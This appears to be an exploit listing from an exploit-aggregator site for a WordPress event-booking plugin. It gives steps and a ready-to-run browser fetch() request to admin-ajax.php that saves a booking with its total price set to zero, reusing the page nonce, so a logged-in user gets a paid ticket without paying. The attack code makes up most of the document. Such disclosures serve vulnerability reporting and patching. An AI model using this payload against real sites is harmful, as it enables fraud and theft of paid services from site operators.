## https://sploitus.com/exploit?id=WPEX-ID:D2019E59-DB6C-4014-8057-0644C9A00665
Create an Event, noting its ID. Add a ticket type to the Event, ensuring that the price is not zero.
As a logged-in user, go through the process of paying for an event booking until the "Select Payment Method" page. Then run the following code in the browser (replacing EVENT_ID) and note that a booking has been created without payment.
await (await fetch("/wp-admin/admin-ajax.php", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
},
"body": "action=ep_save_event_booking&data=ep_event_booking_event_id%3DEVENT_ID%26ep_event_booking_user_id%3D1%26ep_event_booking_total_price%3D0%26ep_event_booking_total_tickets%3D1%26ep_save_event_booking_nonce%3D" + document.querySelector("[name=ep_save_event_booking_nonce]").value ,
"method": "POST",
})).text();